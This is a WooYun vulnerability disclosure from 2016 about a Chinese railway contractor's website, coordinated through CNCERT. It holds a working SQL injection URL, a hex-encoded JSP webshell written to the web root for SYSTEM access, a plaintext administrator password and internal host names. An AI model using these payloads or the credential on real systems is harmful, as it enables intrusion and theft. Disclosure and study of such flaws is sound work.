当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193698

漏洞标题:中铁一局某站SQLi+XXE+文件上传getshell(system权限\可控多台服务器\集团内部通讯系统)

相关厂商:中铁一局集团有限公司

漏洞作者: 路人甲

提交时间:2016-04-08 05:00

修复时间:2016-05-27 14:00

公开时间:2016-05-27 14:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经确认,细节仅向厂商公开
2016-04-22: 细节向核心白帽子及相关领域专家公开
2016-05-02: 细节向普通白帽子公开
2016-05-12: 细节向实习白帽子公开
2016-05-27: 细节向公众公开

简要描述:

中铁一局某站SQLi+XXE+文件上传getshell(system权限\可控多台服务器\集团内部通讯系统)

详细说明:

漏洞站点:
**.**.**.**/ (后面会证明是中铁一局的)

x0.png


该系统存在SQL注入漏洞

**.**.**.**/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user(),3,version(),5%23


y1.png


XXE漏洞具体详情 请看:http://**.**.**.**/bugs/wooyun-2015-0143276
直接上传文件 getshell:

POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8 
Content-Length: 14376
Content-Type: application/x-www-form-urlencoded
sysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23


直接getshell,而且还是system权限
nt authority\system

y2.png


直接抓取密码得到管理员的密码:xycqwe123
可以登录内部网络中其他服务器:
-------------------------------------------------------------------------------
\\WIN-F3VON3GUP7K
\\XYC-9D53425FE71
\\XYC-OLDOA
\\XYC-TEST
命令成功完成。
\\XYC-9D53425FE71 登录这台, 可以看到企业采用的是广讯通 内部通讯系统,里面显示了整个集团的结构和组织,联系人.....

x4.png


可以登录其他机器:

x0.png


x1.png


x2.png


x3.png


漏洞证明:

x1.png


x2.png


x3.png


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-04-12 13:54

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给陕西分中心,由其后续协调网站管理单位处置.

最新状态:

暂无